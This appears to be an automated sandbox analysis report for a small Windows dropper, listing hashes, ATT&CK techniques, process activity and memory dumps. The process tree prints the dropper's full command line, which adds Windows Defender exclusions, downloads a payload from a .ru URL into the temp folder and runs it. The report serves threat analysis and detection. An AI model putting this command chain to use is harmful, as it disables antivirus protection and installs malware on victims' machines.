064108b26f82e4cf579d93efb547401cc61436c1027edede6bd5ecf601cc8b8a

General

Target

ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
Size

5KB
MD5

ee53c22fb468250a322d4e4af41d7cf4
SHA1

ad4fd512fbe16266cc5d61557a7586e7acb92ac5
SHA256

064108b26f82e4cf579d93efb547401cc61436c1027edede6bd5ecf601cc8b8a
SHA512

2e3af9ac12cc85e3f5a84dec9114c392f643389a1e29b9b85eadcab17671baadc640265bc52463d14fe603211ee0d2a6e6ec1cf495dede8b8aa3592a09d1d2ec
SSDEEP

96:xFNM1k9DrbN793yG6dihlu6O4mNnkOGX3aLlYR:xvuAF93yXihf9EUXaY

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://f0550716.xsph.ru/U3ew1mckZfTHHAs

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2680	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe
1728	powershell.exe
2664	powershell.exe
2672	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2664	powershell.exe
2672	powershell.exe
2680	powershell.exe
1728	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3028 wrote to memory of 2760	3028	ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2760	3028	ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2760	3028	ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe	30
PID 2760 wrote to memory of 2664	2760	cmd.exe	32
PID 2760 wrote to memory of 2664	2760	cmd.exe	32
PID 2760 wrote to memory of 2664	2760	cmd.exe	32
PID 2760 wrote to memory of 2672	2760	cmd.exe	33
PID 2760 wrote to memory of 2672	2760	cmd.exe	33
PID 2760 wrote to memory of 2672	2760	cmd.exe	33
PID 2760 wrote to memory of 2680	2760	cmd.exe	34
PID 2760 wrote to memory of 2680	2760	cmd.exe	34
PID 2760 wrote to memory of 2680	2760	cmd.exe	34
PID 2760 wrote to memory of 1728	2760	cmd.exe	35
PID 2760 wrote to memory of 1728	2760	cmd.exe	35
PID 2760 wrote to memory of 1728	2760	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','scr','bat','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('http://f0550716.xsph.ru/U3ew1mckZfTHHAs', '%Temp%\\system32.scr') & powershell Start-Process -FilePath '%Temp%\\system32.scr' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath @('C:\Users\Admin','C:\Users\Admin\AppData\Roaming','C:\Users\Admin\AppData\Local\Temp','C:\Windows','C:','C:') -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension @('exe','scr','bat','dll') -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://f0550716.xsph.ru/U3ew1mckZfTHHAs', 'C:\Users\Admin\AppData\Local\Temp\\system32.scr')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\system32.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
301b36720233e2a5439980ed539951ee

SHA1
0eb75505b9e634bf785a80736fc12792cce19f5f

SHA256
f5f86a9b809ab87cf21bd4e1ef45edad6d9074b1b5f0a801981cb18b6030673b

SHA512
1157fae6dca4d033f0b494ec51c43f268b53069b2f80aba3dbbbda29237035b54c85a475129e581db8669db6e598a412e8276536be6b6599039a0b268ddac435

Download Submit
memory/2664-6-0x000000001B420000-0x000000001B702000-memory.dmp

Filesize
2.9MB

Download
memory/2664-7-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2672-13-0x000000001B170000-0x000000001B452000-memory.dmp

Filesize
2.9MB

Download
memory/2672-14-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/3028-0-0x000007FEF4F43000-0x000007FEF4F44000-memory.dmp

Filesize
4KB

Download
memory/3028-1-0x0000000000390000-0x0000000000398000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing